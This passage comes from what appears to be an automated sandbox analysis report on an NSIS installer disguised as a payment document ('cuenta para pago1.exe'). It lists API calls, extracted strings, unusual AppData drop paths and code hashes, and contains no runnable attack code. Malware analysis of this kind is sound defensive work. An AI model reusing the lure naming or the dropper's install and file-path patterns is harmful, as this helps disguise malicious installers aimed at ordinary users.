                                                                                        • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$&B
                                                                                      • API String ID: 2624150263-2801710114
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 4227406936-0
                                                                                      • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                      • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004074E4,?,?,004074D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\, xrefs: 00402154
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\
                                                                                      • API String ID: 542301482-3308347815
                                                                                      • Opcode ID: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                                                                      • Opcode Fuzzy Hash: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404319
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040434A
                                                                                      • GetSysColor.USER32(?), ref: 0040435B
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                                                      • lstrlenW.KERNEL32(?), ref: 0040437C
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                                                      • SendMessageW.USER32(00000000), ref: 004043FE
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                                                      • SetCursor.USER32(00000000), ref: 0040447D
                                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 00404492
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                                                      • SetCursor.USER32(00000000), ref: 004044A1
                                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 004044D0
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                      • String ID: Call$N$open
                                                                                      • API String ID: 3615053054-2563687911
                                                                                      • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                                                      • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                                      • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                                                      • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                                      • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405EDC,?,?), ref: 00405D7C
                                                                                      • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                                                      • wsprintfA.USER32 ref: 00405DC0
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                                                      • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                      • API String ID: 222337774-899692902
                                                                                      • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                                                      • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                      • CharNextW.USER32(?,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                                      • CharPrevW.USER32(?,?,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                                                                      • *?|<>/":, xrefs: 00406300
                                                                                      • "C:\Users\user\Desktop\cuenta para pago1.exe", xrefs: 004062AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-4061203493
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                                                      • GetSysColor.USER32(00000000), ref: 0040417E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404196
                                                                                      • GetSysColor.USER32(?), ref: 004041A9
                                                                                      • SetBkColor.GDI32(?,?), ref: 004041B9
                                                                                      • DeleteObject.GDI32(?), ref: 004041D3
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                                                      • GetMessagePos.USER32 ref: 00404A66
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404A80
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                                                      • MulDiv.KERNEL32(000C7ED2,00000064,000C9BB8), ref: 00402D4D
                                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                      • wsprintfW.USER32 ref: 004049DF
                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$&B
                                                                                      • API String ID: 3540041739-2907463167
                                                                                      • Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                                                      • Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsqE113.tmp$C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll
                                                                                      • API String ID: 3109718747-2042789371
                                                                                      • Opcode ID: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                                                                      • Opcode Fuzzy Hash: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • lstrlenW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                                                                      • GetFileAttributesW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: 4Ww$C:\Users\user\AppData\Local\Temp\$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3248276644-1436605439
                                                                                      • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                                      • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                                                                      • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                                      • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
